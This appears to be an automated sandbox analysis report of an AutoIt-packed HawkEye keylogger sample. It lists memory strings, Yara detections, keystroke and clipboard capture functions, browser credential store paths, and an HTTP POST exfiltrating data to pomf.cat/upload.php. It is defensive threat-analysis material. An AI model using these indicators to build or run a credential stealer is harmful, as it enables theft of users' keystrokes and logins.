Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQcijPNIB_ZGSU0DrjPI_tJ1YOI-6PHUbyHUjTLi3M5nnkK
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQehqYcvOrRcw1YORGnrCzHbNyjMegefhpqYrPQO8G2_KPc
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQyeaAiOCtrhzoyiUuHOZcp67UWv4aYiYIKZ629tWqIyQ_l
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR6qDJUCBqqO8k81oIRUuLKwKNP-ux5oIGn1btf&s=0
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRXMqY1lU5NXqI7H2QRWgHFAYTsfVdew3_6QMhtv0g&s=10
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRZaO1x4iyU-YgxgvuerXdFmXdj8Ce3rNy8Mqw2SlqePXDg
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRlHYHZu1FxxbUNbpii9NbSF3wy4srqmfLAOC-QBxw&s
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS2yfg_cFEuqKFbNZCaFykqy-jW3vHyGM224t0Sov33iXvh
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS7Tsy61sPGCiV6yILYtCYyP2q9i9bHmXBPqktk0xQvTH0l
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS9bnSRFZj9kLnT0CeZ7r27C9IrO3sFLnQL62gz&s=0
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSHEjIxVJou5NRecC2n_FnHaUJDfppR3IDOglu2Ry9INoxt
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSKx7_Dt9K5OFgp-raiLw2XdVNOTbR27N_DCL6T8VDVN_16
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSTkM_f5rN2hSSg3E_UshkUpgZ0a66Lz0rF6gF6&s=0
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcScI5035wSfgyvpN8fX27BnFHfF4a7I8z7Xlm7v&s=0
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSpNsTsg--kCoAxXjTvRrABIfJjd5ITzVx14ODQUC4wDGzB
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSrCEL2r-B2oHHnS0EeiVjQLJYayeF4GHjCZod9vr4&s
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSvX77JsybkskW6WoLj5kY6exJKuOkXoRWSsNgJbFY&s
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT9-gm37CbSVQ1QMRdyqOvdY12lHBO7fXpaqZZqKP2Wbjr2
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTKoe8A2_V1bWtOlP5fx10ZdjsJZv6l2_sKjTp6jVAPnp0g
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcThUknsbAksExwESRgK7TW5ujPLzgeGDT0-A3f5a1XrdyR-
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTo0t2j428kWHZlc2etqXbsI-zLrpgSp87E2H24&s=0
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v14/4UabrENHsxJlGDuGo1OIlLU94YtzCwA.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc-.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmSU5fBBc-.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmWUlfBBc-.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxM.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNQXwBwQrE_SUsnWzwpadcOOdc8yOg6JxthQN
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNTXuGHPo1zFjYPXt7mTG-4GALGGk8bjqjvBm
Source: bhv7420.tmp.6.dr String found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNQP1yCl9r5iywZTFTjpazv-DURVxDidzMfrF
Source: bhv7420.tmp.6.dr String found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNSrZsXAj6n_sYvivJecwrpYgMhb9ihVGAlz2
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: vbc.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: RegAsm.exe, 00000005.00000002.934256237.0000000002C8A000.00000004.00000001.sdmp String found in binary or memory: https://pomf.cat
Source: RegAsm.exe, 00000005.00000002.934256237.0000000002C8A000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.934360737.0000000002CCE000.00000004.00000001.sdmp String found in binary or memory: https://pomf.cat/upload.php
Source: RegAsm.exe, 00000005.00000002.934360737.0000000002CCE000.00000004.00000001.sdmp String found in binary or memory: https://pomf.cat80Vq
Source: RegAsm.exe, 00000005.00000002.934256237.0000000002C8A000.00000004.00000001.sdmp String found in binary or memory: https://pomf.catx&
Source: vbc.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: unknown DNS traffic detected: queries for: pomf.cat
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_0092A09A recv, 5_2_0092A09A
Source: global traffic HTTP traffic detected: GET /upload.php HTTP/1.1Content-Type: multipart/form-data; boundary=--------------------8d9bbe600e4c00bHost: pomf.catConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /upload.php HTTP/1.1Content-Type: multipart/form-data; boundary=--------------------8d9bbe62af9ef5cHost: pomf.cat
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: RegAsm.exe, 00000005.00000002.935121039.00000000064D1000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.933727810.0000000002A72000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.936518834.0000000006A82000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.702552238.0000000004223000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.934256237.0000000002C8A000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.934824260.00000000049B0000.00000004.00020000.sdmp, RegAsm.exe, 00000005.00000002.934360737.0000000002CCE000.00000004.00000001.sdmp, vbc.exe, 00000006.00000000.710405266.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000006.00000002.720695334.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000006.00000000.709905577.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000000.729725775.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000002.744899042.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000000.730911698.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: RegAsm.exe, 00000005.00000002.935121039.00000000064D1000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.933727810.0000000002A72000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.936518834.0000000006A82000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.702552238.0000000004223000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.934256237.0000000002C8A000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.934824260.00000000049B0000.00000004.00020000.sdmp, RegAsm.exe, 00000005.00000002.934360737.0000000002CCE000.00000004.00000001.sdmp, vbc.exe, 00000006.00000000.710405266.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000006.00000002.720695334.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000006.00000000.709905577.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000000.729725775.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000002.744899042.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000000.730911698.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: unknown HTTP traffic detected: POST /upload.php HTTP/1.1Content-Type: multipart/form-data; boundary=--------------------8d9bbe600e4c00bHost: pomf.catContent-Length: 739867Expect: 100-continueConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected HawkEye Keylogger
Source: Yara match File source: 5.0.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegAsm.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.932841819.0000000000702000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.934551459.0000000003152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.936778010.0000000004132000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.698490007.0000000000702000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.697292626.0000000000702000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.933574671.00000000029C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.934765521.00000000031EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.934844447.000000000328C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.697471372.0000000004252000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe PID: 2228, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00EF2344 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW, 1_2_00EF2344
Contains functionality for read data from the clipboard
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0040F078 OpenClipboard,GetLastError,DeleteFileW, 6_2_0040F078
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F7CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 1_2_00F7CDAC
Creates a window with clipboard capturing capabilities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Window created: window name: CLIPBRDWNDCLASS

System Summary:

Malicious sample detected (through community Yara rule)
Source: 5.3.RegAsm.exe.427b8f2.1.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 5.0.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 5.0.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: HawkEye v9 Payload Author: ditekshen
Source: 5.2.RegAsm.exe.49b0345.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 5.2.RegAsm.exe.4a0834a.1.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 5.2.RegAsm.exe.4a0834a.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, type: UNPACKEDPE Matched rule: HawkEye v9 Payload Author: ditekshen
Source: 5.2.RegAsm.exe.49b0000.3.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 5.0.RegAsm.exe.700000.1.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 5.0.RegAsm.exe.700000.1.unpack, type: UNPACKEDPE Matched rule: HawkEye v9 Payload Author: ditekshen
Source: 5.3.RegAsm.exe.42235a8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 5.3.RegAsm.exe.427b8f2.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 5.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 5.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: HawkEye v9 Payload Author: ditekshen
Source: 5.3.RegAsm.exe.42235a8.2.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 5.3.RegAsm.exe.42238ed.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 5.2.RegAsm.exe.49b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 00000005.00000002.932841819.0000000000702000.00000020.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000001.00000002.934551459.0000000003152000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000001.00000002.936778010.0000000004132000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000005.00000000.698490007.0000000000702000.00000020.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000005.00000000.697292626.0000000000702000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000005.00000002.933574671.00000000029C9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000001.00000002.934765521.00000000031EA000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000001.00000002.934844447.000000000328C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000001.00000003.697471372.0000000004252000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000005.00000002.934824260.00000000049B0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: Process Memory Space: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe PID: 2228, type: MEMORYSTR Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Binary is likely a compiled AutoIt script file
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934120953.0000000000FA5000.00000002.00020000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script.
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934120953.0000000000FA5000.00000002.00020000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
AutoIt script contains suspicious strings
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe AutoIt Script: 8 = 35655668 THEN $BIN_SHELLCODE &= TSFBMFFUMPUS (IR
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe AutoIt Script: 958812 THEN LOCAL $LPSHELLCODE = $E ($B (TSFBMFFUM
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00EFE060 1_2_00EFE060
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00EFE800 1_2_00EFE800
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00EFFE40 1_2_00EFFE40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F06843 1_2_00F06843
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F7804A 1_2_00F7804A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F27006 1_2_00F27006
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F26522 1_2_00F26522
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F0710E 1_2_00F0710E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F116C4 1_2_00F116C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F08A0E 1_2_00F08A0E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F1BFE6 1_2_00F1BFE6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F1DBB5 1_2_00F1DBB5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5E0A1 5_2_04B5E0A1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5D090 5_2_04B5D090
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5DCE8 5_2_04B5DCE8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5E8D3 5_2_04B5E8D3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B51CC3 5_2_04B51CC3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B50801 5_2_04B50801
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B54998 5_2_04B54998
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B55588 5_2_04B55588
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5A1E2 5_2_04B5A1E2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B57518 5_2_04B57518
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5D950 5_2_04B5D950
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5D6B0 5_2_04B5D6B0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B57A11 5_2_04B57A11
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B58B90 5_2_04B58B90
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53398 5_2_04B53398
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5A798 5_2_04B5A798
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5E330 5_2_04B5E330
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B57F10 5_2_04B57F10
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B538B7 5_2_04B538B7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B508B0 5_2_04B508B0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B55890 5_2_04B55890
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B55880 5_2_04B55880
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5388B 5_2_04B5388B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5E8E2 5_2_04B5E8E2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5DCD8 5_2_04B5DCD8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B58439 5_2_04B58439
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B50816 5_2_04B50816
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53C00 5_2_04B53C00
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5E86E 5_2_04B5E86E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53868 5_2_04B53868
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B545B1 5_2_04B545B1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B54DB0 5_2_04B54DB0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B54DA1 5_2_04B54DA1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B53580 5_2_04B53580
